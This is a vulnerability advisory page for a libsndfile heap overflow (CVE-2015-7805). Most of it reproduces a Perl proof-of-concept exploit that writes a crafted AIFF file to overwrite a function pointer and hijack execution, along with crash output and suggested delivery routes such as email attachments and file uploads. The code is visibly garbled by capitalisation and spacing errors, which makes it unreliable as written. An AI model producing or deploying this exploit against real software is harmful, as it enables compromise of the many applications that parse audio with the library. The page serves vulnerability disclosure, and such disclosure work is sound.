Libsndfile Heap Buffer Overflow Vulnerability (CVE-2015-7805)

Libsndfile Heap Buffer Overflow Vulnerability (CVE-2015-7805)
Libsndfile Heap Buffer Overflow Vulnerability (CVE-2015-7805)

Release date:
Updated on:

Affected Systems:

libsndfile libsndfile 1.0.25

Description:

CVE (CAN) ID: CVE-2015-7805

Libsndfile is the C library used to read and write sound files through standard interfaces.

Libsndfile 1.0.25 does not properly process the headindex value of The AIFF file header. A security vulnerability exists. Remote attackers can exploit this vulnerability to manage the index value and overwrite the memory heap with memcpy.

<* Source: Marco Romano
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/env perl
#
# Exploit Title: libsndfile <= 1.0.25 (latest version) Heap overflow
# Date: 07 osct 2015
# Exploit Author: Marco Romano @ nemux _
# Vendorhomepage: http://www.mega-nerd.com/libsndfile/
# Version: <= 1.0.25
# Tested on: Ubuntu 15.04/OS X El Capitan 10.11
#
######################################## ############################
#
# Author: Marco Romano (@ nemux _)-07 Oct 2015
#
# PoC for libsndfile <= 1.0.25 (latest version) Heap overflow
#
# Run./poc. pl to make nemux. aiff file. Now it can be delivered in different ways.
#
# Possible attack vectors:
#-Firefox (on Linux)-> SWF/Audio play-> pulseaudio-> libsndfile ?? (Not tested)
#-Email attachment
#-TCP socket connection (for audio server only)
#-File upload (ex. server side audio file manipulation, interactive voice responder)
#-Etc...
# Renewal #-----------------------------------------------------------------------------------------
# [*] Affected products: -- All products using libsndfile (a non-exhaustive list below)
#
# [-] PusleAudio-http://www.freedesktop.org/wiki/Software/PulseAudio/ (TESTED)
# Installed by default on most linux environments with libsndfile too (Ex.: Ubuntu, Debian)
# [-] Jack AudioConnectionKit-http://www.jackaudio.org (TESTED)
# Available for Linux, Win, OSX (List of applications http://www.jackaudio.org/applications)
# [-] Adobe Audition-http://www.adobe.com/products/audition.html (TESTED)
# [-] Audacity-http://www.audacityteam.org/(TESTED)
# [-] Asterisk-eSpeak Module-https://zaf.github.io/Asterisk-eSpeak/ (not tested)
#
# Run an "apt-cache rdepends libsndfile1" to see other interesting dependencies
# Searching around I found that library is widely used on IOS and Android projects too
# Renewal #------------------------------------------------------------------------------------------
# [*] Libsndfile web site references
#
# [-] Http://www.mega-nerd.com/libsndfile/
# [-] Https://github.com/erikd/libsndfile.git
# [-] Https://en.wikipedia.org/wiki/Libsndfile
#
# Note: (wikipedia reports that LAME encoder depends by libsndfile too
# But I didn't find this dependecy ...)
######################################## ######################################## ########
#### Vulnerability is based on the wrong management of the headindex and headend values.
#### While parsing a specially crafted AIFF header the attacker can manage index values
#### In order to use memcpy (...) to overwrite memory heap.
######################################## ######################################## ########
####
# Some parts of the source code:
#
# -- Common. c: 337 [*]
#...
# Define SF_STR_BUFFER_LEN (8192)
# Define SF_HEADER_LEN (4100 + SF_STR_BUFFER_LEN)
#...
# Typedef struct sf_private_tag
#{
#...
#...
#/* Index variables for maintaining logbuffer and header above .*/
#...
# Int headindex, headend;
#...
#/* Virtual I/O functions .*/
# Int virtual_io;
# SF_VIRTUAL_IO vio;
#...
#...
#} SF_PRIVATE;
#
# Take a look to the source of aiff. c:
# -- Git clone https://github.com/erikd/libsndfile.git
#
# Src or aiff. c: 403
# While (! Done ){...}
# -->
# Src/common. c:
# Int psf_binheader_readf (SF_PRIVATE * psf, char const * format ,...){}
# -->
# Src/common. c: 793
# Static int header_read (SF_PRIVATE * psf, void * ptr, int bytes)
# -->
# Src/common. c:
# Static int header_read (...){
#...
# Memcpy (ptr, psf-> header + psf-> headindex, bytes );
# Psf-> headindex + = bytes;
#
#}/* Header_read */
#
# Thourgh a specially crafted AIFF header we can
#1-increase and decrease the headindex value regardless what shocould be its real value
#2-Overwriting memory with arbitrary data...
#
### Pulseudio test on x86_64
#
# Starting program:/usr/bin/paplay nemux. aiff
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1 ".
# Program received signal SIGSEGV, Segmentation fault.
# [---------------------------------- Registers -----------------------------------]
# RAX: 0x41414141 ('aaa ')
# RBX: 0x60d3e0 --> 0x0
# RCX: 0x610a80 --> 0x0
# RDX: 0x44444444 ('ddddd ')
# RSI: 0x1
# RDI: 0x7ea
# RBP: 0x36b0
# RSP: 0x7fffffffd958 --> 0x7ffff76cfe71 (pop rbx)
# RIP: 0x41414141 ('aaa ')
#...
# [--------------------------------------- Code -----------------------------------]
# Invalid $ PC address: 0x41414141
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
#0x0000000041414141 in ?? ()
#########
######################################## ######################################## ##########

My $ header_aiff_c = "\ x46 \ x4F \ x52 \ x4D". ### FORM and VERSION
"\ X00 \ x00 \ xD0 \ x7C ".
"\ X41 \ x49 \ x46 \ x43 ".
"\ X42 \ x56 \ x45 \ x52 ".
"\ X00 \ x00 \ x00 \ x04 ".
"\ XA2 \ x80 \ x51 \ x40 ".
"\ X43 \ x4F \ x4D \ x4D". ### COMM Chunk and Compression NONE (PCM)
"\ X00 \ x00 \ x00 \ x11 ".
"\ X00 \ x01 \ x00 \ x00 ".
"\ X00 \ x00 \ x00 \ x10 ".
"\ XF3 \ x0C \ xFA \ x00 ".
"\ X00 \ x00 \ x00 \ x00 ".
"\ X00 \ x00 \ x4E \ x4F ".
"\ X4E \ x45 \ x0E \ x6E ".
"\ X6F \ x74 \ x20 \ x63 ".
"\ X63 \ x6D \ x92 \ x72 ".
"\ X65 \ x73 \ x53 \ x65 \ x64 \ x00 ".
"\ X53 \ x53 \ x4E \ x44". ### 2 SSND Chunks
"\ X00 \ x00 \ x00 \ x40 ".
"\ X00 \ x00 \ x00 \ xAA ".
"\ XBD \ xC5 \ x58 ".
"\ XBD \ x96 \ xCA \ xB0 ".
"\ XE9 \ x6F \ x0A \ xFE ".
"\ X24 \ xCD \ x26 \ x65 ".
"\ X73 \ x73 \ x65 \ x64 ".
"\ X00 \ x53 \ x53 \ x4E ".
"\ X44 \ x00 \ x00 \ x00 ".
"\ X40 \ x00 \ x00 \ x00 ".
"\ X00 \ xF8 \ x72 \ xF3 ".
"\ X59 \ xFB \ x56 \ xFE ".
"\ X00 \ x00 \ x00 \ x3E ".
"\ XE9 \ x22 \ x66 \ x94 ".
"\ X4E \ x66 \ x55 \ x94 ".
"\ X4E \ xD4 \ xD7 \ xC5 ".
"\ X42 \ x49 \ x61 \ xC4 ".
"\ X43 \ x4F \ x4D \ x54". ### 2 COMT Chunks
"\ X00 \ x00 \ x00 \ x26 ".
"\ X00 \ x01 \ x00 \ x20 ".
"\ X68 \ x17 \ x0C \ x10 ".
"\ X25 \ x03 \ x00 \ x10". ### 0x2503 items
"\ X03 \ x80 \ xFF \ x37 ".
"\ X52 \ x00 \ x00 \ x00 ".
"\ X04 \ xA2 \ x8E \ x51 ".
"\ X40 \ x43 \ x4F \ x4D ".
"\ X54 \ x00 \ x00 \ x0B ".
"\ X26 \ x00 \ x01 \ x00 ".
"\ X20 \ x68 ".
"\ X17 \ x00 \ x10 \ x03". ### Start wrong and junk chunks (they will trigger default block in the switch statement in aiff. c)
"\ X03 \ x00 \ x10 \ x1B ".
"\ X80 \ xFF \ x4F ".
"\ X4E \ x45 \ x1F \ x6E". ### my debug: heap 0x161e0d8
"\ X6F \ x00 \ x01 \ x00". ### my debug: heap 0x161e0dc
"\ X00 \ xE4 \ x7F \ x72 ".###...
"\ X00 \ x00 \ x00 \ xD7 ".
"\ XBA \ x17 \ xFF \ xE3 ".
"\ X1F \ x40 \ xFF \ x20 ".
"\ X18 \ x08 \ xDD \ x18 ".
"\ X00 \ x28 \ x00 \ x28 ".
"\ X00 \ x28 \ x40 \ x28 ".
"\ X00 \ x28 \ x00 \ x28 ".
"\ X00 \ x28 \ xFF ".
"\ XFF \ x80 \ xF7 \ x17 ".
"\ X00 \ x18 \ x01 \ x00 ".
"\ X20 \ x68 \ x17 \ x0C ".
"\ X10 \ x03 \ x03 \ x00 ".
"\ X10 \ x03 \ x80 \ xFF ".
"\ XFF \ x4F \ x4E \ x45 ".
"\ X0A \ x6E \ cross \ x00 ".
"\ X18 \ xDE \ x3A \ x08 ".
"\ X00 \ x18 \ x21 \ xA6 ".
"\ X05 \ x7F \ x40 \ x00 ".
"\ X08 \ xFF \ x5D \ x00 ".
"\ XF0 \ x00 \ x4F \ x00 ".
"\ X6A \ xFF \ x89 \ x9D ".
"\ XDA \ x07 \ xB6 \ xFF ".
"\ X2C \ x92 \ xB3 \ x0D ".
"\ XE4 \ x40 \ xBB \ x23 ".
"\ X00 \ x18 \ x00 \ x38 ".
"\ X00 \ x63 \ x00 \ x28 ".
"\ X00 \ x90 \ xFF ".
"\ X20 \ x18 \ x08 \ xDD ".
"\ X18 \ x00 \ x28 \ x00 ".
"\ X28 \ x00 \ x5E \ xFC ".
"\ X78 \ xD9 \ xAD \ xCD ".
"\ X9E \ x3E \ xE9 \ x21 ".
"\ X55 \ x94 \ x4E \ x85 ".
"\ X51 \ x94 \ x4E \ xA6 ".
"\ XD7 \ xC5 \ x42 \ xA7 ".
"\ X2A \ x55 \ xC4 \ x9F ".
"\ X43 \ x4F \ x4D \ x54". ### here start next COMT Chunk with 0x36B0 items
"\ X08 \ x00 \ x00 \ x26 ".
"\ X00 \ x01 \ x00 \ x20 ".
"\ X68 \ x17 \ x0C \ xDD ".
"\ X36 \ xB0"; #### end of header...

My $ file = "nemux. aiff ";

If ($ ARGV [0] eq "h" | $ ARGV [0] eq "help "){
Print "\ n [*] POC for libsndfile <= 1.0.25 (latest version) \ n ";
Print "[*] Heap overflow vulnerability \ n ";
Print "[*] Author: Marco Romano (\ @ nemux _)-07 Oct 2015 \ n ";
Print "\ n Just run". $0. "(output will be \" nemux. aiff \ "file) \ n ";
Exit 0;
}

My $ eax_addr = 0x41414141;
My $ edx_addr = 0x44444444;

#####
#### We are going to overwirte psf structure allocated in the heap
#####

My $ content_file = pack ('Q', $ eax_addr );
$ Content_file. = "\ x90" x (21146-length pack ('Q', $ eax_addr ));

#####
### In the psf structure we will overwrite "int virtual_io" with a true value, and vio. seek function pointer
### With an arbitrary address.
### In this way the block below will be triggred in file_io.c:
###...
### If (psf-> virtual_io)
### Return psf-> vio. seek (...);
###
#####
My $ rax_overwrite = pack ('Q', $ eax_addr); ### overwrite vio. seek pointer here
My $ padding = "\ x43" x 24 ;###....
My $ rdx_overwrite = pack ('Q', $ edx_addr); ### overwrite rdx here...
My $ padding_end_file = "MOMIMANHACKERNOW" x 7; ### not useful but funny ...-_-

Print "\ n [*] Making AIFF file: \" nemux. aiff \"";
My $ payload = $ header_aiff_c. $ content_file. $ rax_overwrite. $ padding. $ rdx_overwrite. $ padding_end_file;
Print "\ n [*] Done... AIFF File Size:". length ($ payload). "\ n ";
Print "\ nIs it over? ... Hello? ... Did we win? (Cit.) \ n ";

Open ($ FILE, "> $ file ");
Print $ FILE $ payload;
Close ($ FILE );

Print "\ n [+] You can test it on OSX and Linux with Audacity-linux command line/usr/bin/audacity namux. aiff \ n ";
Print "[+] You can test it on OSX Windows and Linux-with Adobe Audition ";
Print "\ nNote: Adobe Audition will trigger the bug just when it scans the directory that contains this aiff file \ n ";
Print "Marco Romano \ @ nemux _ \ n ";

Suggestion:

Vendor patch:

Libsndfile
----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.mega-nerd.com/libsndfile/

This article permanently updates the link address: